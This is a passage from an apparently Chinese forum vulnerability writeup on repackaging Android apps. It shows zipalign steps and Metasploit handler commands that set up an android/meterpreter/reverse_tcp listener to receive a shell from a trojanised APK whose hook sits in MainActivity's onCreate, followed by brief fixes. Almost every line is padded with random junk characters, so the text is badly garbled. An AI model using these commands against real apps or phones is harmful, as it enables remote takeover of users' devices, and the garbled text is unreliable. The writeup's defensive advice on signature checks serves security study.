, ?8 E3 x' Z; i 9 L5 U) P' c, j4 f4 r4 o" [. [1 U zipalign -v 4 repackaged.apk final.apk , L2 B. Y' z" {( ]0 T2 J& O3 g 5 ?; B: i4 D2 A4 x

! x! K* O1 s: Z 0 e0 {) X! U3 X) ^ 检查是否对齐 / i! a/ ^2 h6 @- M5 N+ x 7 e& `; f8 |8 g

0 k) e% e; S; X# y7 e% J1 S. |3 T/ j& J zipalign -c -v 4 final.apk 7 `, b7 E7 g" r/ r# ^. \- a0 } 8 q9 |9 H4 {" m* ?3 l% P; N

3 m4 E: Z+ {* R; l9 U7 ? ( H h. f R" w" Q 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 l* r9 ^& u7 D/ A8 D " ~) e0 m; v1 Z! s) Q" V3 B

8 Y: ^# t) G# {3 }, g9 c% G. g8 y( w 启动Metasploit控制台，配置参数等待上线 # F3 r) ~# g1 h9 Z3 s * T" Z$ M! n, _( W0 w7 v- E

5 {9 f; J% O6 @+ N- M- `: L; y3 D& P8 P# R4 [6 p# V 在终端依次输入如下命令 ) l* Y, q! ]9 }$ G) T+ h' h$ x% _ ) ]0 Y+ t+ T/ Y$ H

# A4 D6 T* H2 W3 w9 n 9 {' u! w! ^' I: S0 p4 k& W5 a msfconsole # o& L# X4 v1 e9 [1 a) J7 D! ]" b # ^ e4 r% I4 X7 ~% S6 s

- ~7 D, p5 k! _ 5 e* }, p+ a$ q# `3 n& n use exploit/multi/handler $ O8 ~1 j r8 ? $ z. I! k3 a, C! o# F

+ G* @6 e0 Z. Y+ b # H, h( t8 M% G0 y" F* U set PAYLOAD android/meterpreter/reverse_tcp " Z& ^8 P* f+ L+ z* s( s3 i2 P, u $ |0 O, R, D& a: A7 B {7 Z! e

+ K1 H2 j- w- P* u; Q ' {- I5 e: ?1 b4 p; s) [! c set LHOST 192.xxx.xx.xx 1 h4 E, H: x7 \4 z) O) v $ f' B: H7 X- b4 Z

. r# @8 `+ o( D7 e ! \# W) a* w: [9 f set LPORT 4444 5 ^- i; o. J5 s7 k. v / t6 X# w/ E# |. v7 L/ s

E7 P0 h3 u) z- W3 O5 M+ ?0 } 7 R8 f+ S4 k; Q O exploit D* w$ I7 G. \; h9 @+ D( D. [ + N1 Y; N& D5 f9 i% N: p

1 W5 J; J4 Y$ }! \. d 8 u3 C3 S: \! V- c& R: Z 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： - q2 b4 {. B" Y$ F; O# S2 e+ x! G$ M8 G1 U0 v# \4 E5 }2 B. W

- l" n6 E* t9 Q; W1 R2 t/ V! |1 ~1 }* z, g0 i: p3 y+ j& ]/ Z 漏洞危害：中 # j/ ~' W7 i) b9 }" S3 U : T5 Q2 ]* ]5 Y: ^7 i' E

+ ~7 M2 ^+ x3 B, j0 C2 s: D4 d 2 @3 f6 R$ v* M . q, d$ P1 ^. m" C2 I+ x) F7 O 严重程度 * a7 e& k( T9 F% t) v+ \- o . H* R$ Z; c8 { ?) O( e: r; ?6 s0 f4 \|% D: P: A	) L! k; \; R. \|/ Y8 e4 n5 _; s c0 Y! M' r( { ! Z. M5 \, d4 k7 q; I2 \|5 a& \ 9 j# p. S8 I, f& f Q 高 - s; i2 V4 p0 a( N" @5 {8 I; b0 M& w% \' C8 h8 V3 g - O3 B8 J: b1 i9 p2 H; b+ _ 1 r4 j9 N+ O5 s, C	! b1 F2 x. ] d# K; T & b$ a' f" {: D- Z U$ \|# \|- a# s2 l3 E 3 \. I# F' F* c& d ■ $ H& T$ j; B2 Z: x( _# h1 Y% o' A ( i8 Z2 t0 w6 w3 x/ L& R9 G / L; O% s8 O2 g* v9 N& H3 `( I; ` & \|: a @( C9 D# M3 k* N. [9 A	+ s4 ]1 T( p# a0 _ 5 v) F4 S- h. H, O/ q P' O% N4 x6 N; \5 ~& Y & n) n/ W9 P5 I 中 6 e2 ^+ I" d) \|2 P x, K' \! Q v* M 4 A0 O. ]: {. {* b* h2 ] ( U) Q8 ^& \8 d	, t0 y4 U2 ?. g. h. q7 x 0 Q; L: n7 }' _ - \|7 N! ~ g6 V& K. A+ N! \|# x, i' p e& X$ u# E- Q # m; H0 q% b6 k- F" T/ a 3 Y2 L2 ^2 u. G3 h& {5 l : t \% z6 X0 c) [5 E/ y7 m& C1 k: _2 N i2 @ ! W- g8 Y4 g) K" d5 O0 b& ^( R$ s- l7 Z 2 g: n% o0 O" T. Z8 ~4 C	0 N- h0 h3 D4 v + ^% e2 x8 m- H- r; \, S/ r ( H; A1 X) U; {0 p* J 4 \, z* ?" K4 h- h1 n4 S 低 ( u9 \5 F/ X# d \|" O2 @0 ]( Q / c0 Z& n( P9 c " [4 d3 ]# Z: q% r 0 a5 Z, b5 h* Q6 r	; ^0 i! I6 @" `' n! l. G3 {; n) W) P% t, f8 J, O# U& X 7 E! r7 U n& Q2 _2 ^/ m% ?- A* V: g 8 a6 h" G' P% g$ m + T, A7 J6 Y- L* V2 F7 [! F6 ?* P8 N/ Q 0 y3 g3 I* V# {7 \' b1 v# O ?* A ) i& X1 v# e: `; j8 Y4 U2 X 3 T1 J; d" \|. b1 M8 V * K4 v+ V2 Q0 ?0 Y& ?: S0 X H9 I2 g2 V" r$ [: w( \6 W4 u( H' q

- v% K* l( F: F5 R: c% U% H: f+ g! V& s# t% g4 r4 n ! s8 j* {% H) b- j8 L' l# a% o) T8 L: n: O. X6 E

. ^$ n# N1 T! K/ k! N 4 S( N4 z6 z1 ^1 Z 修复方法： / D) m S0 j0 @ % w y1 a. J& O: |9 _

$ f! l$ u8 U1 ? u# Y & ?0 g# q% k) H" t. Y+ L 1.在 APP 启动时应做签名校验防止二次打包。
3 L- h7 T! {4 d* A ) G& A* |! a) k1 A) s 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 # W4 |. B2 L" ]8 W' O; }9 U8 r" p! {' _( z3 B

* i" ]- [% `( l : z- P5 q9 S7 S0 J& q& z ( r3 M3 p8 G" t% W+ z9 D ) I7 [+ ^& E; `( h' l3 z* n$ k J( E9 i

; l9 E: {0 P) W# w! `3 M 2 j0 d5 |, d% ~8 s
0 `3 d+ Q4 p, p: u0 m' Q) I 5 A7 K+ X( n. Q9 v' a" ~2 x

		自动登录	找回密码
密码			立即注册